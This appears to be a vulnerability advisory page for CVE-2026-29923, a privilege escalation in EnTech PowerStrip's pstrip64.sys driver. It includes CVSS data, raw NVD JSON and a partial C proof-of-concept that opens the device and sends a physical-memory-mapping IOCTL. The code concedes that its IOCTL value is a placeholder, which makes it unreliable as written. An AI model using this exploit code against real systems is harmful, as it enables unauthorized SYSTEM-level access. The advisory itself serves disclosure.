Security Vulnerability Report
中文
CVE-2026-29923 CVSS 7.8 HIGH

CVE-2026-29923

Published: 2026-04-09 20:16:25
Last Modified: 2026-04-14 17:16:49
Source: [email protected]

Description

The pstrip64.sys driver in EnTech Taiwan PowerStrip <=3.90.736 allows local users to escalate privileges to SYSTEM via a crafted IOCTL request enabling unprivileged users to map arbitrary physical memory into their address space and modify critical kernel structures.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

EnTech Taiwan PowerStrip <= 3.90.736

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * PoC for CVE-2026-29923 - PowerStrip pstrip64.sys Privilege Escalation * This code demonstrates how to send a malicious IOCTL to map physical memory. * WARNING: For educational purposes only. */ #include <windows.h> #include <stdio.h> #define DEVICE_NAME "\\\\.\\PStrip64" // IOCTL code may vary, this is a placeholder for the vulnerable control code #define IOCTL_MAP_PHYSICAL_MEMORY 0x222003 typedef struct _PHYSICAL_MEMORY_RANGE { UINT64 PhysicalAddress; SIZE_T Size; } PHYSICAL_MEMORY_RANGE, *PPHYSICAL_MEMORY_RANGE; int main() { HANDLE hDevice = INVALID_HANDLE_VALUE; DWORD bytesReturned = 0; PHYSICAL_MEMORY_RANGE inputBuffer; PVOID mappedAddress = NULL; printf("[*] Attempting to open device %s...\n", DEVICE_NAME); hDevice = CreateFileA( DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL ); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] Failed to open device. Error: %d\n", GetLastError()); return 1; } printf("[+] Device opened successfully.\n"); // Attempt to map physical memory (e.g., HAL heap or EPROCESS) inputBuffer.PhysicalAddress = 0x1000; // Example target address inputBuffer.Size = 0x1000; printf("[*] Sending IOCTL to map physical memory at 0x%llx...\n", inputBuffer.PhysicalAddress); BOOL result = DeviceIoControl( hDevice, IOCTL_MAP_PHYSICAL_MEMORY, &inputBuffer, sizeof(inputBuffer), &mappedAddress, sizeof(mappedAddress), &bytesReturned, NULL ); if (result) { printf("[+] IOCTL successful! Memory mapped at: 0x%p\n", mappedAddress); // Here an attacker would manipulate kernel structures } else { printf("[-] IOCTL failed. Error: %d\n", GetLastError()); } CloseHandle(hDevice); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-29923", "sourceIdentifier": "[email protected]", "published": "2026-04-09T20:16:24.693", "lastModified": "2026-04-14T17:16:48.907", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The pstrip64.sys driver in EnTech Taiwan PowerStrip <=3.90.736 allows local users to escalate privileges to SYSTEM via a crafted IOCTL request enabling unprivileged users to map arbitrary physical memory into their address space and modify critical kernel structures."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://entechtaiwan.com/util/ps.shtm", "source": "[email protected]"}, {"url": "https://packetstorm.news/files/id/218394/", "source": "[email protected]"}, {"url": "https://packetstorm.news/files/id/218394/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.